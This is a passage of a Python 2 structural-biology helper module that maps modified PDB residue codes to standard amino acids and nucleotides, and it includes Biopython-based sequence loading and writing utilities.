'HID' : 'HIS' , # single delta N protonation
'HIE' : 'HIS' , # single epsilon N protonation
'3AH':'HIS', ## 3AH HIS
'DDE':'HIS', ## DDE HIS
'DHI':'HIS', ## DHI HIS D-HISTIDINE
'HIA':'HIS', ## HIA HIS L-HISTIDINE AMIDE
'HIC':'HIS', ## HIC HIS 4-METHYL-HISTIDINE
'HIP':'HIS', ## HIP HIS ND1-PHOSPHONOHISTIDINE...or commonly used doubly protonated state
'HIQ':'HIS', ## HIQ HIS MODIFIED HISTIDINE
'HIS':'HIS', ## HIS HIS
'HSO':'HIS', ## HSO HIS HISTIDINOL
'MHS':'HIS', ## MHS HIS 1-N-METHYLHISTIDINE
'NEP':'HIS', ## NEP HIS N1-PHOSPHONOHISTIDINE
'NZH':'HIS', ## NZH HIS
'OHI':'HIS', ## OHI HIS 3-(2-OXO-2H-IMIDAZOL-4-YL)-L-ALANINE
'PSH':'HIS', ## PSH HIS 1-THIOPHOSPHONO-L-HISTIDINE
'DIL' : 'ILE' , # HETEROATOM THAT MAY BE TREATED AS ILE
'IIL' : 'ILE' , # HETEROATOM THAT MAY BE TREATED AS ILE
'ILE' : 'ILE' , # ILE
'B2I':'ILE', ## B2I ILE ISOLEUCINE BORONIC ACID
'DIL':'ILE', ## DIL ILE D-ISOLEUCINE
'IIL':'ILE', ## IIL ILE ISO-ISOLEUCINE
'ILE':'ILE', ## ILE ILE
'ILX':'ILE', ## ILX ILE 4,5-DIHYDROXYISOLEUCINE
'IML':'ILE', ## IML ILE N-METHYLATED
'ALY' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'DLY' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'KCX' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'LLP' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'LLY' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'LYM' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'LYS' : 'LYS' , # LYS
'LYZ' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'MLY' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'SHR' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'TRG' : 'LYS' , # HETEROATOM THAT MAY BE TREATED AS LYS
'6CL':'LYS', ## 6CL LYS 6-CARBOXYLYSINE
'ALY':'LYS', ## ALY LYS N(6)-ACETYLLYSINE
'API':'LYS', ## API LYS 2,6-DIAMINOPIMELIC ACID
'APK':'LYS', ## APK LYS
'AZK':'LYS', ## AZK LYS (2S)-2-AMINO-6-TRIAZANYLHEXAN-1-OL
'B3K':'LYS', ## B3K LYS (3S)-3,7-DIAMINOHEPTANOIC ACID
'BLY':'LYS', ## BLY LYS LYSINE BORONIC ACID
'C1X':'LYS', ## C1X LYS MODIFIED LYSINE
'CLG':'LYS', ## CLG LYS
'CLH':'LYS', ## CLH LYS
'CYJ':'LYS', ## CYJ LYS MODIFIED LYSINE
'DLS':'LYS', ## DLS LYS DI-ACETYL-LYSINE
'DLY':'LYS', ## DLY LYS D-LYSINE
'DNL':'LYS', ## DNL LYS 6-AMINO-HEXANAL
'FHL':'LYS', ## FHL LYS MODIFIED LYSINE
'GPL':'LYS', ## GPL LYS LYSINE GUANOSINE-5'-MONOPHOSPHATE
'IT1':'LYS', ## IT1 LYS
'KCX':'LYS', ## KCX LYS CARBAMOYLATED LYSINE
'KGC':'LYS', ## KGC LYS
'KST':'LYS', ## KST LYS N~6~-(5-CARBOXY-3-THIENYL)-L-LYSINE
'LA2':'LYS', ## LA2 LYS
'LCK':'LYS', ## LCK LYS
'LCX':'LYS', ## LCX LYS CARBAMYLATED LYSINE
'LDH':'LYS', ## LDH LYS N~6~-ETHYL-L-LYSINE
'LET':'LYS', ## LET LYS ODIFIED LYSINE
'LLP':'LYS', ## LLP LYS
'LLY':'LYS', ## LLY LYS NZ-(DICARBOXYMETHYL)LYSINE
'LSO':'LYS', ## LSO LYS MODIFIED LYSINE
'LYM':'LYS', ## LYM LYS DEOXY-METHYL-LYSINE
'LYN':'LYS', ## LYN LYS 2,6-DIAMINO-HEXANOIC ACID AMIDE
'LYP':'LYS', ## LYP LYS N~6~-METHYL-N~6~-PROPYL-L-LYSINE
'LYR':'LYS', ## LYR LYS MODIFIED LYSINE
'LYS':'LYS', ## LYS LYS
'LYX':'LYS', ## LYX LYS N''-(2-COENZYME A)-PROPANOYL-LYSINE
'LYZ':'LYS', ## LYZ LYS 5-HYDROXYLYSINE
'M2L':'LYS', ## M2L LYS
'M3L':'LYS', ## M3L LYS N-TRIMETHYLLYSINE
'MCL':'LYS', ## MCL LYS NZ-(1-CARBOXYETHYL)-LYSINE
'MLY':'LYS', ## MLY LYS METHYLATED LYSINE
'MLZ':'LYS', ## MLZ LYS N-METHYL-LYSINE
'OBS':'LYS', ## OBS LYS MODIFIED LYSINE
'SLZ':'LYS', ## SLZ LYS L-THIALYSINE
'XX1':'LYS', ## XX1 LYS N~6~-7H-PURIN-6-YL-L-LYSINE
'BUG' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'CLE' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'DLE' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'LEU' : 'LEU' , # LEU
'MLE' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'NLE' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'NLN' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'NLP' : 'LEU' , # HETEROATOM THAT MAY BE TREATED AS LEU
'1LU':'LEU', ## 1LU LEU 4-METHYL-PENTANOIC ACID-2-OXYL GROUP
'2ML':'LEU', ## 2ML LEU 2-METHYLLEUCINE
'BLE':'LEU', ## BLE LEU LEUCINE BORONIC ACID
'BUG':'LEU', ## BUG LEU TERT-LEUCYL AMINE
'CLE':'LEU', ## CLE LEU LEUCINE AMIDE
'DCL':'LEU', ## DCL LEU 2-AMINO-4-METHYL-PENTANYL GROUP
'DLE':'LEU', ## DLE LEU D-LEUCINE
'DNE':'LEU', ## DNE LEU D-NORLEUCINE
'DNG':'LEU', ## DNG LEU N-FORMYL-D-NORLEUCINE
'DNM':'LEU', ## DNM LEU D-N-METHYL NORLEUCINE
'FLE':'LEU', ## FLE LEU FUROYL-LEUCINE
'HLU':'LEU', ## HLU LEU BETA-HYDROXYLEUCINE
'LED':'LEU', ## LED LEU POST-TRANSLATIONAL MODIFICATION
'LEF':'LEU', ## LEF LEU 2-5-FLUOROLEUCINE
'LEU':'LEU', ## LEU LEU
'LNT':'LEU', ## LNT LEU
'MHL':'LEU', ## MHL LEU N-METHYLATED, HYDROXY
'MLE':'LEU', ## MLE LEU N-METHYLATED
'MLL':'LEU', ## MLL LEU METHYL L-LEUCINATE
'MNL':'LEU', ## MNL LEU 4,N-DIMETHYLNORLEUCINE
'NLE':'LEU', ## NLE LEU NORLEUCINE
'NLN':'LEU', ## NLN LEU NORLEUCINE AMIDE
'NLO':'LEU', ## NLO LEU O-METHYL-L-NORLEUCINE
'PLE':'LEU', ## PLE LEU LEUCINE PHOSPHINIC ACID
'PPH':'LEU', ## PPH LEU PHENYLALANINE PHOSPHINIC ACID
'CXM' : 'MET' , # HETEROATOM THAT MAY BE TREATED AS MET
'FME' : 'MET' , # HETEROATOM THAT MAY BE TREATED AS MET
'MET' : 'MET' , # MET
'MSE' : 'MET' , # HETEROATOM THAT MAY BE TREATED AS MET
'OMT' : 'MET' , # HETEROATOM THAT MAY BE TREATED AS MET
'AME':'MET', ## AME MET ACETYLATED METHIONINE
'CXM':'MET', ## CXM MET N-CARBOXYMETHIONINE
'ESC':'MET', ## ESC MET 2-AMINO-4-ETHYL SULFANYL BUTYRIC ACID
'FME':'MET', ## FME MET FORMYL-METHIONINE
'FOR':'MET', ## FOR MET
'MET':'MET', ## MET MET
'MHO':'MET', ## MHO MET POST-TRANSLATIONAL MODIFICATION
'MME':'MET', ## MME MET N-METHYL METHIONINE
'MSE':'MET', ## MSE MET ELENOMETHIONINE
'MSO':'MET', ## MSO MET METHIONINE SULFOXIDE
'OMT':'MET', ## OMT MET METHIONINE SULFONE
'SME':'MET', ## SME MET METHIONINE SULFOXIDE
'ASN' : 'ASN' , # ASN
'MEN' : 'ASN' , # HETEROATOM THAT MAY BE TREATED AS ASN
'AFA':'ASN', ## AFA ASN N-[7-METHYL-OCT-2,4-DIENOYL]ASPARAGINE
'AHB':'ASN', ## AHB ASN BETA-HYDROXYASPARAGINE
'ASN':'ASN', ## ASN ASN
'B3X':'ASN', ## B3X ASN (3S)-3,5-DIAMINO-5-OXOPENTANOIC ACID
'DMH':'ASN', ## DMH ASN N4,N4-DIMETHYL-ASPARAGINE
'DSG':'ASN', ## DSG ASN D-ASPARAGINE
'MEN':'ASN', ## MEN ASN GAMMA METHYL ASPARAGINE
'DPR' : 'PRO' , # HETEROATOM THAT MAY BE TREATED AS PRO
'PRO' : 'PRO' , # PRO
'1AB':'PRO', ## 1AB PRO 1,4-DIDEOXY-1,4-IMINO-D-ARABINITOL
'2MT':'PRO', ## 2MT PRO
'4FB':'PRO', ## 4FB PRO (4S)-4-FLUORO-L-PROLINE
'DPL':'PRO', ## DPL PRO 4-OXOPROLINE
'DPR':'PRO', ## DPR PRO D-PROLINE
'H5M':'PRO', ## H5M PRO TRANS-3-HYDROXY-5-METHYLPROLINE
'HY3':'PRO', ## HY3 PRO 3-HYDROXYPROLINE
'HYP':'PRO', ## HYP PRO 4-HYDROXYPROLINE
'LPD':'PRO', ## LPD PRO L-PROLINAMIDE
'P2Y':'PRO', ## P2Y PRO (2S)-PYRROLIDIN-2-YLMETHYLAMINE
'PCA':'PRO', ## PCA PRO 5-OXOPROLINE
'POM':'PRO', ## POM PRO CIS-5-METHYL-4-OXOPROLINE
'PRO':'PRO', ## PRO PRO
'PRS':'PRO', ## PRS PRO THIOPROLINE
'DGN' : 'GLN' , # HETEROATOM THAT MAY BE TREATED AS GLN
'GLN' : 'GLN' , # GLN
'DGN':'GLN', ## DGN GLN D-GLUTAMINE
'GHG':'GLN', ## GHG GLN GAMMA-HYDROXY-GLUTAMINE
'GLH':'GLN', ## GLH GLN
'GLN':'GLN', ## GLN GLN
'MGN':'GLN', ## MGN GLN 2-METHYL-GLUTAMINE
'ACL' : 'ARG' , # HETEROATOM THAT MAY BE TREATED AS ARG
'AGM' : 'ARG' , # HETEROATOM THAT MAY BE TREATED AS ARG
'ARG' : 'ARG' , # ARG
'ARM' : 'ARG' , # HETEROATOM THAT MAY BE TREATED AS ARG
'DAR' : 'ARG' , # HETEROATOM THAT MAY BE TREATED AS ARG
'HAR' : 'ARG' , # HETEROATOM THAT MAY BE TREATED AS ARG
'HMR' : 'ARG' , # HETEROATOM THAT MAY BE TREATED AS ARG
'2MR':'ARG', ## 2MR ARG N3, N4-DIMETHYLARGININE
'AAR':'ARG', ## AAR ARG ARGININEAMIDE
'ACL':'ARG', ## ACL ARG DEOXY-CHLOROMETHYL-ARGININE
'AGM':'ARG', ## AGM ARG 4-METHYL-ARGININE
'ALG':'ARG', ## ALG ARG GUANIDINOBUTYRYL GROUP
'AR2':'ARG', ## AR2 ARG ARGINYL-BENZOTHIAZOLE-6-CARBOXYLIC ACID
'ARG':'ARG', ## ARG ARG
'ARM':'ARG', ## ARM ARG DEOXY-METHYL-ARGININE
'ARO':'ARG', ## ARO ARG C-GAMMA-HYDROXY ARGININE
'BOR':'ARG', ## BOR ARG
'CIR':'ARG', ## CIR ARG CITRULLINE
'DA2':'ARG', ## DA2 ARG MODIFIED ARGININE
'DAR':'ARG', ## DAR ARG D-ARGININE
'HMR':'ARG', ## HMR ARG BETA-HOMOARGININE
'HRG':'ARG', ## HRG ARG L-HOMOARGININE
'MAI':'ARG', ## MAI ARG DEOXO-METHYLARGININE
'MGG':'ARG', ## MGG ARG MODIFIED D-ARGININE
'NMM':'ARG', ## NMM ARG MODIFIED ARGININE
'OPR':'ARG', ## OPR ARG C-(3-OXOPROPYL)ARGININE
'ORQ':'ARG', ## ORQ ARG N~5~-ACETYL-L-ORNITHINE
'TYZ':'ARG', ## TYZ ARG PARA ACETAMIDO BENZOIC ACID
'DSN' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'MIS' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'OAS' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'SAC' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'SEL' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'SEP' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'SER' : 'SER' , # SER
'SET' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'SVA' : 'SER' , # HETEROATOM THAT MAY BE TREATED AS SER
'B3S':'SER', ## B3S SER (3R)-3-AMINO-4-HYDROXYBUTANOIC ACID
'BG1':'SER', ## BG1 SER
'DHL':'SER', ## DHL SER POST-TRANSLATIONAL MODIFICATION
'DSE':'SER', ## DSE SER D-SERINE N-METHYLATED
'DSN':'SER', ## DSN SER D-SERINE
'FGP':'SER', ## FGP SER
'GVL':'SER', ## GVL SER SERINE MODIFED WITH PHOSPHOPANTETHEINE
'HSE':'SER', ## HSE SER L-HOMOSERINE
'HSL':'SER', ## HSL SER HOMOSERINE LACTONE
'MC1':'SER', ## MC1 SER METHICILLIN ACYL-SERINE
'MIS':'SER', ## MIS SER MODIFIED SERINE
'N10':'SER', ## N10 SER O-[(HEXYLAMINO)CARBONYL]-L-SERINE
'NC1':'SER', ## NC1 SER NITROCEFIN ACYL-SERINE
'OAS':'SER', ## OAS SER O-ACETYLSERINE
'OSE':'SER', ## OSE SER O-SULFO-L-SERINE
'PG1':'SER', ## PG1 SER BENZYLPENICILLOYL-ACYLATED SERINE
'PYR':'SER', ## PYR SER CHEMICALLY MODIFIED
'S1H':'SER', ## S1H SER 1-HEXADECANOSULFONYL-O-L-SERINE
'SAC':'SER', ## SAC SER N-ACETYL-SERINE
'SBD':'SER', ## SBD SER
'SBG':'SER', ## SBG SER MODIFIED SERINE
'SBL':'SER', ## SBL SER
'SDP':'SER', ## SDP SER
'SEB':'SER', ## SEB SER O-BENZYLSULFONYL-SERINE
'SEL':'SER', ## SEL SER 2-AMINO-1,3-PROPANEDIOL
'SEP':'SER', ## SEP SER E PHOSPHOSERINE
'SER':'SER', ## SER SER
'SET':'SER', ## SET SER AMINOSERINE
'SGB':'SER', ## SGB SER MODIFIED SERINE
'SGR':'SER', ## SGR SER MODIFIED SERINE
'SOY':'SER', ## SOY SER OXACILLOYL-ACYLATED SERINE
'SUN':'SER', ## SUN SER TABUN CONJUGATED SERINE
'SVA':'SER', ## SVA SER SERINE VANADATE
'SVV':'SER', ## SVV SER MODIFIED SERINE
'SVX':'SER', ## SVX SER MODIFIED SERINE
'SVY':'SER', ## SVY SER MODIFIED SERINE
'SVZ':'SER', ## SVZ SER MODIFIED SERINE
'SXE':'SER', ## SXE SER MODIFIED SERINE
'ALO' : 'THR' , # HETEROATOM THAT MAY BE TREATED AS THR
'BMT' : 'THR' , # HETEROATOM THAT MAY BE TREATED AS THR
'DTH' : 'THR' , # HETEROATOM THAT MAY BE TREATED AS THR
'THR' : 'THR' , # THR
'TPO' : 'THR' , # HETEROATOM THAT MAY BE TREATED AS THR
'AEI':'THR', ## AEI THR ACYLATED THR
'ALO':'THR', ## ALO THR ALLO-THREONINE
'BMT':'THR', ## BMT THR
'CRO':'THR', ## CRO THR CYCLIZED
'CTH':'THR', ## CTH THR 4-CHLOROTHREONINE
'DTH':'THR', ## DTH THR D-THREONINE
'OLT':'THR', ## OLT THR O-METHYL-L-THREONINE
'TBM':'THR', ## TBM THR
'TH5':'THR', ## TH5 THR O-ACETYL-L-THREONINE
'THC':'THR', ## THC THR N-METHYLCARBONYLTHREONINE
'THR':'THR', ## THR THR
'TMD':'THR', ## TMD THR N-METHYLATED, EPSILON C ALKYLATED
'TPO':'THR', ## TPO THR HOSPHOTHREONINE
'DIV' : 'VAL' , # HETEROATOM THAT MAY BE TREATED AS VAL
'DVA' : 'VAL' , # HETEROATOM THAT MAY BE TREATED AS VAL
'MVA' : 'VAL' , # HETEROATOM THAT MAY BE TREATED AS VAL
'VAL' : 'VAL' , # VAL
'B2V':'VAL', ## B2V VAL VALINE BORONIC ACID
'DIV':'VAL', ## DIV VAL D-ISOVALINE
'DVA':'VAL', ## DVA VAL D-VALINE
'MNV':'VAL', ## MNV VAL N-METHYL-C-AMINO VALINE
'MVA':'VAL', ## MVA VAL N-METHYLATED
'NVA':'VAL', ## NVA VAL NORVALINE
'VAD':'VAL', ## VAD VAL DEAMINOHYDROXYVALINE
'VAF':'VAL', ## VAF VAL METHYLVALINE
'VAL':'VAL', ## VAL VAL
'VDL':'VAL', ## VDL VAL (2R,3R)-2,3-DIAMINOBUTANOIC ACID
'VLL':'VAL', ## VLL VAL (2S)-2,3-DIAMINOBUTANOIC ACID
'VME':'VAL', ## VME VAL O- METHYLVALINE
'DTR' : 'TRP' , # HETEROATOM THAT MAY BE TREATED AS TRP
'HTR' : 'TRP' , # HETEROATOM THAT MAY BE TREATED AS TRP
'LTR' : 'TRP' , # HETEROATOM THAT MAY BE TREATED AS TRP
'TPL' : 'TRP' , # HETEROATOM THAT MAY BE TREATED AS TRP
'TRO' : 'TRP' , # HETEROATOM THAT MAY BE TREATED AS TRP
'TRP' : 'TRP' , # TRP
'BTR':'TRP', ## BTR TRP 6-BROMO-TRYPTOPHAN
'1TQ':'TRP', ## 1TQ TRP 6-(FORMYLAMINO)-7-HYDROXY-L-TRYPTOPHAN
'23S':'TRP', ## 23S TRP MODIFIED TRYPTOPHAN
'32S':'TRP', ## 32S TRP MODIFIED TRYPTOPHAN
'32T':'TRP', ## 32T TRP MODIFIED TRYPTOPHAN
'4DP':'TRP', ## 4DP TRP
'4FW':'TRP', ## 4FW TRP 4-FLUOROTRYPTOPHANE
'4HT':'TRP', ## 4HT TRP 4-HYDROXYTRYPTOPHAN
'4IN':'TRP', ## 4IN TRP 4-AMINO-L-TRYPTOPHAN
'6CW':'TRP', ## 6CW TRP 6-CHLORO-L-TRYPTOPHAN
'DTR':'TRP', ## DTR TRP D-TRYPTOPHAN
'FTR':'TRP', ## FTR TRP FLUOROTRYPTOPHANE
'HTR':'TRP', ## HTR TRP BETA-HYDROXYTRYPTOPHANE
'PAT':'TRP', ## PAT TRP ALPHA-PHOSPHONO-TRYPTOPHAN
'TOX':'TRP', ## TOX TRP
'TPL':'TRP', ## TPL TRP TRYTOPHANOL
'TQQ':'TRP', ## TQQ TRP
'TRF':'TRP', ## TRF TRP N1-FORMYL-TRYPTOPHAN
'TRN':'TRP', ## TRN TRP AZA-TRYPTOPHAN
'TRO':'TRP', ## TRO TRP 2-HYDROXY-TRYPTOPHAN
'TRP':'TRP', ## TRP TRP
'TRQ':'TRP', ## TRQ TRP
'TRW':'TRP', ## TRW TRP
'TRX':'TRP', ## TRX TRP 6-HYDROXYTRYPTOPHAN
'TTQ':'TRP', ## TTQ TRP 6-AMINO-7-HYDROXY-L-TRYPTOPHAN
'DTY' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'IYR' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'PAQ' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'PTR' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'STY' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'TYB' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'TYQ' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'TYR' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'TYS' : 'TYR' , # TYR
'TYY' : 'TYR' , # HETEROATOM THAT MAY BE TREATED AS TYR
'1TY':'TYR', ## 1TY TYR
'2TY':'TYR', ## 2TY TYR
'3TY':'TYR', ## 3TY TYR MODIFIED TYROSINE
'B3Y':'TYR', ## B3Y TYR
'CRQ':'TYR', ## CRQ TYR
'DBY':'TYR', ## DBY TYR 3,5 DIBROMOTYROSINE
'DPQ':'TYR', ## DPQ TYR TYROSINE DERIVATIVE
'DTY':'TYR', ## DTY TYR D-TYROSINE
'ESB':'TYR', ## ESB TYR
'FLT':'TYR', ## FLT TYR FLUOROMALONYL TYROSINE
'FTY':'TYR', ## FTY TYR DEOXY-DIFLUOROMETHELENE-PHOSPHOTYROSINE
'IYR':'TYR', ## IYR TYR 3-IODO-TYROSINE
'MBQ':'TYR', ## MBQ TYR
'NIY':'TYR', ## NIY TYR META-NITRO-TYROSINE
'NBQ':'TYR', ## NBQ TYR
'OTY':'TYR', ## OTY TYR
'PAQ':'TYR', ## PAQ TYR SEE REMARK 999
'PTH':'TYR', ## PTH TYR METHYLENE-HYDROXY-PHOSPHOTYROSINE
'PTM':'TYR', ## PTM TYR ALPHA-METHYL-O-PHOSPHOTYROSINE
'PTR':'TYR', ## PTR TYR O-PHOSPHOTYROSINE
'TCQ':'TYR', ## TCQ TYR MODIFIED TYROSINE
'TTS':'TYR', ## TTS TYR
'TY2':'TYR', ## TY2 TYR 3-AMINO-L-TYROSINE
'TY3':'TYR', ## TY3 TYR 3-HYDROXY-L-TYROSINE
'TYB':'TYR', ## TYB TYR TYROSINAL
'TYC':'TYR', ## TYC TYR L-TYROSINAMIDE
'TYI':'TYR', ## TYI TYR 3,5-DIIODOTYROSINE
'TYN':'TYR', ## TYN TYR ADDUCT AT HYDROXY GROUP
'TYO':'TYR', ## TYO TYR
'TYQ':'TYR', ## TYQ TYR AMINOQUINOL FORM OF TOPA QUINONONE
'TYR':'TYR', ## TYR TYR
'TYS':'TYR', ## TYS TYR INE SULPHONATED TYROSINE
'TYT':'TYR', ## TYT TYR
'TYY':'TYR', ## TYY TYR IMINOQUINONE FORM OF TOPA QUINONONE
'YOF':'TYR', ## YOF TYR 3-FLUOROTYROSINE
# 'GLX' : 'Z' # why is this here!?
}
####################
# NUCLEIC ACID STUFF
# for sequences...
NUCLEIC_SEQUENCE_LETTERS_MAP = {
'A' : 'A' ,
'G' : 'G' ,
'C' : 'C' ,
'T' : 'T' ,
'U' : 'U' ,
'a' : 'A' ,
'g' : 'G' ,
'c' : 'C' ,
't' : 'T' ,
'u' : 'U' ,
'DA' : 'A' ,
'DG' : 'G' ,
'DC' : 'C' ,
'DT' : 'T' ,
'dA' : 'A' ,
'dG' : 'G' ,
'dC' : 'C' ,
'dT' : 'T' ,
'ADE' : 'A' ,
'GUA' : 'G' ,
'CYT' : 'C' ,
'THY' : 'T' ,
'URA' : 'U' ,
'rA' : 'A' ,
'rG' : 'G',
'rC' : 'C' ,
'rU' : 'U' ,
# HETATM lines
'1MA' : 'A' ,
'1MG' : 'G' ,
'2MG' : 'G' ,
'7MG' : 'G' ,
'OMG' : 'G' ,
'YG' : 'G' ,
'5MC' : 'C' ,
'CB2' : 'C' ,
'CBR' : 'C' ,
'DC' : 'C' ,
'OMC' : 'C' ,
'5BU' : 'U' ,
'5MU' : 'U' ,
'H2U' : 'U' ,
'PSU' : 'U' ,
'URI' : 'U'
}
# line_edit = line_edit.replace( 'HO2\'', '2HO*' )
# line_edit = line_edit.replace( 'HO5\'', '5HO*' )
# line_edit = line_edit.replace( 'H5\'\'', '2H5*' )
# line_edit = line_edit.replace('\'','*')
# line_edit = line_edit.replace('OP1','O1P')
# line_edit = line_edit.replace('OP2','O2P')
NA_CODES = {}
NA_CONVERSIONS_ROSETTA = {}
#####
# DNA
# codes whose presence indicates DNA definitively
NA_CODES['DNA'] = {
'T' : 'T' ,
't' : 'T' ,
'DA' : 'A' ,
'DG' : 'G' ,
'DC' : 'C' ,
'DT' : 'T' ,
'dA' : 'A' ,
'dG' : 'G' ,
'dC' : 'C' ,
'dT' : 'T' ,
'THY' : 'T'
}
# convert from sequence to the resName for PDB format
NA_CONVERSIONS_ROSETTA['DNA'] = {
'A' : 'A' ,
'G' : 'G' ,
'C' : 'C' ,
'T' : 'T' ,
'ADE' : 'A' ,
'GUA' : 'G' ,
'CYT' : 'C' ,
'THY' : 'T' ,
'1MA' : 'A' ,
'1MG' : 'G' ,
'2MG' : 'G' ,
'7MG' : 'G' ,
'OMG' : 'G' ,
'YG' : 'G' ,
'5MC' : 'C' ,
'CB2' : 'C' ,
'CBR' : 'C' ,
'DC' : 'C' ,
'OMC' : 'C' ,
}
# water! hooray!
WATER_CONVERSION = {
'W' : 'TP3' ,
'HOH' : 'TP3' ,
'H2O' : 'TP3' ,
'WAT' : 'TP3' ,
'TP3' : 'TP3' ,
'TP5' : 'TP3'
}
# fun with water
#WATER_CODE = 'TP3' # for possible use in PyRosetta
#WATER_CODES = ['W' , 'HOH' , 'H2O' , 'WAT' , 'TP3' , 'TP5'] # resNames
################################################################################
# METHODS
get_file_extension = lambda in_filename: in_filename.split( '.' )[-1]
get_file_extension.__doc__ = 'Returns the file extension of <in_filename>\n\nin_filename.split( \'.\' )[-1]'
# hacky version
get_root_filename = lambda in_filename: in_filename[:-len( get_file_extension( in_filename ) ) - 1]
get_root_filename.__doc__ = 'Returns the \"root filename\" of <in_filename> (pre file extension)\n\nin_filename[:len( in_filename.split( \'.\' )[-1] ) - 1]\na little hacky...'
# better version
#get_root_filename = lambda in_filename: ''.join( [i for i in in_filename.split( '.' )[:-1]] )
# helper for creating a directory, checks and delets existing name
def create_directory( dir_name , tagline = ' to sort the data' ):
"""
Creates the directory <dir_name>
WARNING: this will delete the directory and its contents if it already
exists!
Optionally output something special in <tagline>
"""
# check if it exists
print 'Creating a new directory ' + os.path.relpath( dir_name ) + tagline
if os.path.isdir( dir_name ):
print 'a directory named ' + os.path.relpath( dir_name ) + ' already exists, deleting it now...'
shutil.rmtree( dir_name )
os.mkdir( dir_name )
# copy helper
def copy_file( filename , destination , display = False ):
"""
Copy <filename> to/into <destination>
just a cp wrapper...what?
"""
if display: # optional
if os.path.isdir( destination ):
print 'placing a copy of ' + os.path.relpath( filename ) + ' into the ' + os.path.relpath( destination ) + ' directory'
elif os.path.isfile( destination ):
print 'copying ' + os.path.relpath( filename ) + ' to ' + os.path.relpath( destination )
shutil.copy( filename , destination )
################################################################################
# SEQUENCE HANDLING HELPERS
# basic converters...its done a lot
# loading wrapper...basically cause "from Bio import SeqIO" is too long
def load_sequence( filename , ignore_empty = True , seqformat_map = SEQFORMAT_MAP ):
"""
Returns the list of sequences in <filename> as Biopython SeqRecord
objects
automatically handles different file format as specified by <seqformat_map>
Optionally <ignore_empty> sequences (SeqID in file but no sequence)
To get string, use get_sequence
"""
# determine the file format
seq_format = get_file_extension( filename )
# load ALL the sequences!
sequences = [i for i in SeqIO.parse( filename , seqformat_map[seq_format] )]
if ignore_empty:
sequences = [i for i in sequences if str( i.seq )]
# or just one...
if len( sequences ) == 1:
sequences = sequences[0]
return sequences
# general converter!
def get_sequence( sequence , seq_format = SEQFORMAT , uppercase = True , ignore_empty = True , get_ids = False ):
"""
Returns a string or list of string depending on the input <sequence>
can accept:
a filename for a <seq_format> file
a Biopython Seq object
a Biopython SeqRecord object
a string
a list of any of the above (can be heterogenous)
Optionally change the sequence to <uppercase> (ambiguous positions are
sometimes lowercase)
Optionally <ignore_empty> sequences (SeqID in file but no sequence)
Optionally <get_ids> , returning a parallel list of SeqIDs and descriptions
"""
# sort the input data type
# for common Biopython objects
if type( sequence ) == Seq:
sequence = str( sequence )
elif type( sequence ) == SeqRecord:
seq_ids = str( sequence.id )
seq_des = str( sequence.description )
sequence = str( sequence.seq )
# input file
elif '.' in sequence: # should never occur!
# its a filename (?) so try to load it, it will error properly
sequence = load_sequence( sequence , ignore_empty )
# sort by number
if type( sequence ) == list: # in accordance with the above
# optionally get the ids
if get_ids:
seq_ids = [str( i.id ) for i in sequence]
seq_des = [str( i.description )*( not i.description == i.id ) for i in sequence]
sequence = [str( i.seq ) for i in sequence]
else:
if get_ids:
seq_ids = str( sequence.id )
seq_des = str( sequence.description )*( not sequence.description == sequence.id )
sequence = str( sequence.seq )
# list of any of the above
elif type( sequence ) == list:
# then sort based on individual types...
sequence = [get_sequence( i , seq_format , uppercase , ignore_empty , get_ids ) for i in sequence]
if get_ids:
seq_ids = [i[1] for i in sequence]
seq_des = [i[2] for i in sequence]
sequence = [i[0] for i in sequence]
# should be an input single string
else:
seq_ids = ''
seq_des = ''
# optionally force UPPER case
if uppercase:
if type( sequence ) == str:
# single sequence
sequence = sequence.upper()
else:
# multiple
sequence = [i.upper() for i in sequence]
# optionally return the id and descriptions too
if get_ids:
return sequence , seq_ids , seq_des
return sequence
# general writer
# return the filename
def write_sequence( sequence , out_filename = '' , seq_format = SEQFORMAT , seqid = 'unknown' , description = '' , alphabet = DNAAlphabet , seq_format_map = SEQFORMAT_EXTENSION_MAP ):
"""
Write <sequence> to <out_filename> as <seq_format> using <alphabet>
Robust to sequence inputs that are:
str (filename or sequence)
Seq
SeqRecord
"""
# sort the input data type
unknown = 1
# for common Biopython objects
if isinstance( sequence , str ):
if '.' in sequence: # should never occur, okay, I made it occur
print 'it appears you input a path or filename...so its already a file!'
return sequence
sequence = SeqRecord( Seq( sequence , alphabet ) ) # already default ID of unknown
sequence.id = seqid
sequence.description = description
elif isinstance( sequence , unicode ): # hacky, unicode vs str
sequence = str( sequence )
if '.' in sequence: # should never occur
print 'it appears you input a path or filename...so its already a file!'
return sequence
sequence = SeqRecord( Seq( sequence , alphabet ) ) # already default ID of unknown
sequence.id = seqid
sequence.description = description
elif isinstance( sequence , Seq ):
sequence = SeqRecord( sequence )
sequence.id = seqid
sequence.description = description
